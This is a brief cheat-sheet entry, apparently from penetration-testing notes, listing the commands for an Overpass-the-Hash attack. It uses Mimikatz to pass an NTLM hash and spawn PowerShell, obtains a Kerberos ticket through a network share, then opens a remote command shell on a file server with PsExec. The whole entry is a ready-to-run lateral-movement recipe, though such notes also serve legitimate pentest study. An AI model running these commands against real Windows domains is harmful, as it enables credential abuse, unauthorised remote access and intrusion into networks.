4. Overpass-the-Hash



Overpass-the-Hash Remote Shell using Mimikatz:

  1. Run Mimikatz and enable debug.
  2. Create TGT:
sekurlsa::pth /user:<targetuser> /domain:<domain> /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
  1. Obtain ticket by authenticating to network share:
net use \\files04
  1. Analyze ticket:
klist
  1. Run PsExec and launch cmd using ticket:
.\PsExec.exe \\files04 cmd